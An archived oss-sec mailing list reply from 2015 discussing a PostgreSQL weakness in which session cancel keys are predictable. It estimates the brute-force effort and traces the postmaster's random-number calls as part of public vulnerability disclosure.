oss-sec mailing list archives
Re: PostgreSQL - Predictable cancel key
From: Michael Samuel <mik () miknet net>
Date: Tue, 16 Jun 2015 21:04:52 +1000
Hi, On 16 June 2015 at 20:15, Pierre Schweitzer <pierre () reactos org> wrote:
Well, I've thought about it, but that's still one million seeds and the cancel key you're looking for might have been generated after several random() call. So, that means perhaps 10 millions values to explore? (If we make the hypothesis that for a given initialization, it will only draw 10 PRN)
This is CPU, maybe GPU territory. 2^15-2 * 10m =~ 2^38 work offline.
How relevant would still be your cancel key once you found it?
In the postmaster mainloop:
ConnCreate()
RandomSalt() -- the md5Salt craziness in the original post
BackendStartup()
MyCancelKey = PostmasterRandom();
No other calls to random(), srandom() that I can see, and the other calls
to PostmasterRandom() are generating cancel keys for worker procs.
So if you brute the md5Salt you have a pretty good chance of guessing
something that was/is/will be a cancel key of another session.
Regards,
Michael
Current thread:
- PostgreSQL - Predictable cancel key Bastian Blank (Jun 13)
- Re: PostgreSQL - Predictable cancel key Pierre Schweitzer (Jun 15)
- Re: PostgreSQL - Predictable cancel key Bastian Blank (Jun 15)
- Re: PostgreSQL - Predictable cancel key Pierre Schweitzer (Jun 16)
- Re: PostgreSQL - Predictable cancel key Michael Samuel (Jun 16)
- Re: PostgreSQL - Predictable cancel key Pierre Schweitzer (Jun 17)
- Re: PostgreSQL - Predictable cancel key Bastian Blank (Jun 15)
- Re: PostgreSQL - Predictable cancel key Pierre Schweitzer (Jun 15)